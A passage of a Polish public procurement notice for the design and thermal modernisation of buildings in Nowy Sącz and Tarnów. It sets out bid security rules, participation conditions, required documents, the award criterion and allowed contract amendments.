b)   Okres ważności wadium musi obejmować cały okres związania ofertą.
2. Forma wadium.
a) Wadium może być wniesione w następujących formach:
	- w pieniądzu;
	- w poręczeniach   bankowych   lub   poręczeniach   spółdzielczej	 kasy
	oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem
	pieniężnym;
	- gwarancjach bankowych;
	- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 Ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U 2007 r. Nr 42 poz. 275, z późn. zm.).
3.W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać następujące elementy:
	a) nazwę  dającego  zlecenie (Wykonawcy),  beneficjenta gwarancji lub poręczenia 	(Zamawiającego), gwaranta lub poręczyciela (instytucji udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
	b) określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
	c) kwotę gwarancji lub poręczenia,
	d) termin ważności gwarancji lub poręczenia,
e) zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:
-  Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, dokumentów lub pełnomocnictw (w zależności od przypadku) , o którym mowa w art. 26 ust. 3 uzp. nie złożył wymaganych dokumentów lub oświadczeń, o których mowa w art. 25  ust.  1 uzp lub  pełnomocnictw  (w  zależności  od  przypadku),  chyba  że Wykonawca  udowodni, że wynika to z przyczyn nieleżących po jego stronie; lub
	- Wykonawca, którego Ofertę wybrano odmówił podpisania umowy na warunkach 	określonych w ofercie, lub 
- Wykonawca,   którego   Ofertę   wybrano   nie   wniósł   	zabezpieczenia należytego wykonania umowy, lub 
- z Wykonawcą, którego Ofertę wybrano, zawarcie 	umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
	f) gwarancja lub poręczenie winno być nieodwołalne i bezwarunkowe;
	g) gwarancja lub poręczenie musi być wykonalne na terytorium Rzeczpospolitej Polskiej.
4. Miejsce i sposób wniesienia wadium.
	a) Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący
	rachunek Zamawiającego: 74 1010 1270 0008 9513 9120 0000
    	Przelew powinien wskazywać znak i nazwę postępowania.
	Do Oferty należy dołączyć kopię polecenia przelewu, potwierdzoną za zgodność
	z oryginałem przez Wykonawcę.
5. Wadium wnoszone w innych niż pieniądz formach, należy złożyć najpóźniej wraz z ofertą (jako oddzielny od oferty dokument)
6.Termin wniesienia wadium.
a) Wadium należy wnieść przed upływem terminu składania Ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas,  gdy  bank  prowadzący  rachunek  Zamawiającego  potwierdzi,  	że  otrzymał  taki przelew przed upływem terminu składania Ofert.
	b) W wymienionym przypadku dołączenie do Oferty kopii polecenia przelewu 	wystawionego przez Wykonawcę jest warunkiem koniecznym, ale nie wystarczającym do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.
	c) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium po wyborze oferty najkorzystniejszej,  lub  unieważnieniu postępowania,  jeżeli w wyniku  rozstrzygnięcia  odwołania  jego  oferta  została  	wybrana jako najkorzystniejsza.
7.Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
8. Wykonawców, którzy nie wnieśli wadium do upływu terminu składania ofert, wyklucza się z udziału  w postępowaniu.
9.Zwrot wadium. 
Zamawiający zwróci wadium:
	a) wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego wadium zostało 	zatrzymane lub którego oferta została wybrana jako najkorzystniejsza
	b) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy,
	c) niezwłocznie na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert
10.Utrata wadium. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli:
	a) Wykonawca  w odpowiedzi na wezwanie do uzupełnienia oświadczeń,  dokumentów lub pełnomocnictw (w zależności od przypadku) , o którym mowa w art. 26 ust. 3 uzp, nie złożył wymaganych dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 uzp lub pełnomocnictw (w zależności od przypadku), chyba że Wykonawca   udowodni,  ze wynika to z przyczyn nieleżących po jego 	stronie;
	b) Wykonawca,  którego  Oferta  została  wybrana  odmówił  podpisania  umowy  w  	sprawie zamówienia publicznego na warunkach określonych w ofercie;
	c) Wykonawca,  którego  Oferta  została  wybrana  nie  wniósł  wymaganego 	zabezpieczenia należytego wykonania umowy;
	d) Z Wykonawcą, którego Ofertę wybrano, zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena  spełniania  warunku  zostanie  dokonana  wg  formuły:  spełnia  -  nie  spełnia,  na podstawie złożonego przez Wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ oraz dokumentów określonych w pkt 8.1.1). do pkt 8.1.5);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
	-	co najmniej jedną robotę budowlaną polegającą na zaprojektowaniu i 	wykonaniu robót budowlanych polegających na termomodernizacji  w czynnym 	budynku.
Ocena  spełniania  warunku  zostanie  dokonana  wg  formuły:  spełnia  -  nie  spełnia,  na podstawie złożonego przez Wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ,
- wykazu wykonanych robót, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone . Wzór wykazu stanowi załącznik nr 4 do SIWZ
W przypadku:
- oferty wspólnej dopuszcza się wykazanie oddzielnie posiadania wiedzy i doświadczenia w zaprojektowaniu oraz oddzielnie w wykonaniu robót,
- wykazania polegania na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia  spełniania  niniejszego  warunku  Wykonawca  zobowiązany jest wskazać osoby, które będą uczestniczyć w wykonywaniu  zamówienia wraz z informacjami  na  temat  ich  kwalifikacji  zawodowych,  doświadczenia  i  wykształcenia niezbędnych  do  wykonania  zamówienia,  a  także  zakresu  wykonywanych  przez  nich czynności oraz   informację o podstawie dysponowania tymi osobami. Wykonawca złoży oświadczenie o posiadaniu przez te osoby wymaganych uprawnień budowlanych. W przypadku polegania na osobach zdolnych do wykonania zamówienia oraz potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający wymaga w odniesieniu do tych osób:
1) Kierowanie budową i robotami:
- kierownik budowy posiadający uprawnienia do kierowania robotami    budowlanymi w specjalności konstrukcyjno -budowlanej lub uprawnienia równoważne do powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili ich uzyskania, kierownik budowy winien posiadać doświadczenie w kierowaniu budową polegającą na termomodernizacji budynku czynnego,
- kierownik robót sanitarnych posiadający uprawnienia do kierowania 
robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji
i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych lub uprawnienia równoważne do powyższych, a wydane 
na podstawie przepisów prawa obowiązujących w chwili ich 	uzyskania,
- kierownik robót elektrycznych posiadający uprawnienia do kierowania 
robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń elektrycznych  i elektroenergetycznych lub uprawnienia 
równoważne do powyższych, a wydane na podstawie przepisów prawa 
obowiązujących w chwili ich uzyskania.
(Jeżeli Wykonawca przewiduje ustanowić oddzielnie  kierownika budowy lub robót dla części 1. (budynku Delegatury w Nowy Sączu)  i części 2. (budynku delegatury w Tarnowie), to zobowiązany jest wskazać te osoby).
2) Prace projektowe:
- Projektant posiadający uprawnienia budowlane do projektowania bez  ograniczeń w specjalności architektonicznej lub uprawnienia lub równoważne do powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili ich uzyskania,
- Projektant posiadający uprawnienia do projektowania  bez ograniczeń 
w specjalności konstrukcyjno-budowlanej lub równoważne do powyższych,
- Projektant posiadający uprawnienia budowlane do projektowania bez
ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub
uprawnienia równoważne do powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili ich uzyskania,	
- Projektant posiadający uprawnienia budowlane do projektowania bez
ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
elektrycznych i elektroenergetycznych lub uprawnienia równoważne do
powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili 
ich uzyskania.
Ilekroć Zamawiający wymaga określonych uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie na podstawie Prawa budowlanego,  rozumie przez to również odpowiadające im ważne, uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.
W  przypadku  wykonawców  zagranicznych,  dopuszcza  się  równoważne  kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.12a Prawa budowlanego, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394, 
z późn. zm.). 
Ocena  spełniania  warunku  zostanie  dokonana  wg  formuły:  spełnia  -  nie  spełnia,  na podstawie złożonego przez Wykonawcę:
-   oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2.do SIWZ,
-   wykazu osób które będą uczestniczyły w wykonaniu zamówienia. Wykaz stanowi
   załącznik nr 5 do SIWZ
-  oświadczenia  Wykonawcy  że  osoby  które  będą  wykonywać  zamówienie  posiadają wymagane uprawnienia- wzór oświadczenia stanowi załącznik nr 6 do SIWZ.
Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które będą wykonywać niniejsze zamówienie pod warunkiem że osoba ta spełnia łącznie wymagania dla każdej z łączonych funkcji, z wyjątkiem przypadków określonych w Prawie budowlanym.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  celu  potwierdzenia  spełniania  niniejszego  warunku  Wykonawca  zobowiązany jest wskazać osoby, które będą uczestniczyć w wykonywaniu  zamówienia wraz z informacjami  na  temat  ich  kwalifikacji  zawodowych,  doświadczenia  i  wykształcenia niezbędnych  do  wykonania  zamówienia,  a  także  zakresu  wykonywanych  przez  nich czynności oraz   informację o podstawie dysponowania tymi osobami. Wykonawca złoży oświadczenie o posiadaniu przez te osoby wymaganych uprawnień budowlanych. W przypadku polegania na osobach zdolnych do wykonania zamówienia oraz potencjale technicznym innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający wymaga w odniesieniu do tych osób:
1) Kierowanie budową i robotami:
- kierownik budowy posiadający uprawnienia do kierowania robotami    budowlanymi w specjalności konstrukcyjno -budowlanej lub uprawnienia równoważne do powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili ich uzyskania, kierownik budowy winien posiadać doświadczenie w kierowaniu budową polegającą na termomodernizacji budynku czynnego,
- kierownik robót sanitarnych posiadający uprawnienia do kierowania 
robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji
i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych 
i kanalizacyjnych lub uprawnienia równoważne do powyższych, a wydane 
na podstawie przepisów prawa obowiązujących w chwili ich 	uzyskania,
- kierownik robót elektrycznych posiadający uprawnienia do kierowania 
robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji 
i urządzeń elektrycznych  i elektroenergetycznych lub uprawnienia 
równoważne do powyższych, a wydane na podstawie przepisów prawa 
obowiązujących w chwili ich uzyskania.
(Jeżeli Wykonawca przewiduje ustanowić oddzielnie  kierownika budowy lub robót dla części 1. (budynku Delegatury w Nowy Sączu)  i części 2. (budynku delegatury w Tarnowie), to zobowiązany jest wskazać te osoby).
2) Prace projektowe:
- Projektant posiadający uprawnienia budowlane do projektowania bez  ograniczeń w specjalności architektonicznej lub uprawnienia lub równoważne do powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili ich uzyskania,
- Projektant posiadający uprawnienia do projektowania  bez ograniczeń 
w specjalności konstrukcyjno-budowlanej lub równoważne do powyższych,
- Projektant posiadający uprawnienia budowlane do projektowania bez
ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub
uprawnienia równoważne do powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili ich uzyskania,	
- Projektant posiadający uprawnienia budowlane do projektowania bez
ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
elektrycznych i elektroenergetycznych lub uprawnienia równoważne do
powyższych, a wydane na podstawie przepisów prawa obowiązujących w chwili 
ich uzyskania.
Ilekroć Zamawiający wymaga określonych uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie na podstawie Prawa budowlanego,  rozumie przez to również odpowiadające im ważne, uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących na terenie kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.
W  przypadku  wykonawców  zagranicznych,  dopuszcza  się  równoważne  kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art.12a Prawa budowlanego, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63, poz. 394, 
z późn. zm.). 
Ocena  spełniania  warunku  zostanie  dokonana  wg  formuły:  spełnia  -  nie  spełnia,  na podstawie złożonego przez Wykonawcę:
-   oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2.do SIWZ,
-   wykazu osób które będą uczestniczyły w wykonaniu zamówienia. Wykaz stanowi
   załącznik nr 5 do SIWZ
-  oświadczenia  Wykonawcy  że  osoby  które  będą  wykonywać  zamówienie  posiadają wymagane uprawnienia- wzór oświadczenia stanowi załącznik nr 6 do SIWZ.
Zamawiający dopuszcza łączenie funkcji przez wskazane osoby, które będą wykonywać niniejsze zamówienie pod warunkiem że osoba ta spełnia łącznie wymagania dla każdej z łączonych funkcji, z wyjątkiem przypadków określonych w Prawie budowlanym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże :
­	posiadanie środków finansowych lub posiadanie zdolności kredytowej w wysokości co najmniej 50% wartości oferty;
­posiadanie ubezpieczenia od odpowiedzialności cywilnej na kwotę nie mniejszą niż wartość oferty.
Ocena  spełniania  warunku  zostanie  dokonana  wg  formuły:  spełnia  -  nie  spełnia,  na podstawie złożonego przez Wykonawcę:
- oświadczenia o spełnianiu warunków udziału w postępowaniu-załącznik nr 2 do SIWZ;
- informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawiona nie wcześniej niż 
3 miesiące przed upływem terminu składania ofert,
- opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
W przypadku:
- oferty wspólnej - dopuszcza się wykazanie posiadania środków finansowych lub zdolności kredytowej przez jednego z wykonawców składających wspólną ofertę;
- wykazania polegania na zdolnościach finansowych innych podmiotów - Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zdolnościami finansowymi innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz przedłoży informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zamawiający wymaga aby Wykonawca załączył do wykazu dokumenty potwierdzające, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień umowy może być dokonana w przypadku:
1)	zmian nieistotnych w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy,
2)	okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
a w szczególności:
a)	z uwagi na niezależne od Stron okoliczności zmiany dotyczące osób kluczowych dla realizacji umowy, osób reprezentujących Strony (w szczególności choroba, wypadki losowe, nieprzewidziane zmiany organizacyjne ),
b)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
c)	zmian adresowych Stron umowy określonych w umowie,
